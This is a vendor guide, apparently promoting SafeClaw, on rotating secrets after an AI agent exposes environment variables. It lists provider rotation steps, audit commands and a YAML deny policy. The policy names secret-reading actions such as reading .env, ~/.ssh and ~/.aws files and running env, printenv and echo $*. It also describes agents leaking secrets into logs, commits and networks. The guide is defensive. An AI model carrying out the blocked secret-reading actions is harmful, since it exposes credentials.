AI Agent Leaked Environment Variables: Emergency Rotation Guide

When an AI agent exposes your environment variables — by reading .env files, printing them to logs, including them in commits, or sending them over the network — every secret in those variables is compromised and must be rotated immediately. SafeClaw by Authensor blocks all access to .env files and environment variable commands by default through deny-by-default gating, ensuring agents never see your secrets. If the leak has already happened, follow this emergency rotation guide now.

Emergency Rotation: First 15 Minutes

Rotate in This Order (Highest Risk First)

1. Payment and Financial Keys

• Stripe: Dashboard > Developers > API Keys > Roll Key
• PayPal: Developer Portal > My Apps > Rotate Secret
• Any payment processor: Revoke and regenerate immediately

2. Cloud Infrastructure Credentials

• AWS: IAM > Users > Security Credentials > Create Access Key, then delete the old one
• GCP: IAM > Service Accounts > Keys > Add Key, then delete the old one
• Azure: App Registrations > Certificates & Secrets > New Client Secret

3. Database Credentials

• Change database passwords through your hosting provider
• Update connection strings in your deployment environment (not in .env files that agents can read)

4. API Keys for External Services

• OpenAI: API Keys page > Create new key, delete old one
• SendGrid/Mailgun: Regenerate API keys
• Twilio: Regenerate API key and auth token

5. Authentication Secrets

• JWT_SECRET: Generate a new random secret (this will invalidate all existing sessions)
• OAuth client secrets: Regenerate through identity provider
• Session secrets: Regenerate and redeploy

6. SSH Keys and Tokens

• Remove compromised public keys from all servers
• Generate new key pairs
• Revoke any GitHub/GitLab personal access tokens

Identify the Exposure Vector

How Did the Agent Access Env Vars?

npx @authensor/safeclaw audit --filter "action:file.read" --filter "resource:env" --last 30
npx @authensor/safeclaw audit --filter "action:shell.exec" --filter "resource:env" --last 20

Common exposure vectors:

• Read the .env file directly: The agent used file.read on .env
• Ran env or printenv command: The agent listed all environment variables via shell
• Included env vars in output: The agent printed sensitive values in its response
• Committed .env to git: Check git log -- .env
• Sent env vars over the network: Check network request audit entries

Check Where the Secrets Went

• In git history: Run git log -p --all -S 'SECRET_VALUE'
• In log files: Search application and agent logs for secret values
• In API responses: Check if the agent sent secrets to external services
• In agent output: Check the conversation/session history

Install SafeClaw and Block Env Access

npx @authensor/safeclaw

Configure Environment Variable Protection

Add to your safeclaw.policy.yaml:

rules:
  # Block all env file access
  - action: file.read
    resource: "*/.env"
    effect: deny
    reason: "Env files contain secrets"

- action: file.write
    resource: "*/.env"
    effect: deny
    reason: "Env files must not be modified by agents"

- action: file.delete
    resource: "*/.env"
    effect: deny
    reason: "Env files must not be deleted by agents"

# Block environment variable commands
  - action: shell.exec
    resource: "env"
    effect: deny
    reason: "Cannot list environment variables"

- action: shell.exec
    resource: "printenv*"
    effect: deny
    reason: "Cannot print environment variables"

- action: shell.exec
    resource: "echo $*"
    effect: deny
    reason: "Cannot echo env vars"

- action: shell.exec
    resource: "export *"
    effect: deny
    reason: "Cannot set env vars"

- action: shell.exec
    resource: "set"
    effect: deny
    reason: "Cannot list shell variables"

# Block reading other secret files
  - action: file.read
    resource: "/.aws/"
    effect: deny
    reason: "AWS config blocked"

- action: file.read
    resource: "/.ssh/"
    effect: deny
    reason: "SSH config blocked"

- action: file.read
    resource: "*/credentials"
    effect: deny
    reason: "Credential files blocked"

# Block adding env files to git
  - action: shell.exec
    resource: "git add .env"
    effect: deny
    reason: "Cannot stage env files"

Post-Rotation Checklist

• [ ] All payment/financial keys rotated
• [ ] All cloud infrastructure credentials rotated
• [ ] All database passwords changed
• [ ] All external API keys regenerated
• [ ] All auth secrets (JWT, OAuth, sessions) regenerated
• [ ] All SSH keys and tokens revoked and replaced
• [ ] New secrets deployed to production (through secure channels, not .env files)
• [ ] Old secrets confirmed revoked/deleted at each provider
• [ ] Git history scrubbed if secrets were committed
• [ ] Log files cleared of secret values
• [ ] SafeClaw policy updated to block env access
• [ ] Audit log exported and preserved for incident record

Prevention

SafeClaw's deny-by-default model blocks all env file access and environment variable commands without any configuration needed. The 446-test suite validates this across both Claude and OpenAI integrations. Use a secrets manager (AWS Secrets Manager, HashiCorp Vault, Doppler) instead of .env files, and inject secrets at runtime through your deployment platform rather than storing them on disk.

Related Resources

• Prevent Agent Env File Access
• AI Agent Pushed Secrets to GitHub: Emergency Response
• AI Agent Used the Wrong API Key: Prevention
• Threat: Credential File Read
• AI Agent Sent Data to External Server: Response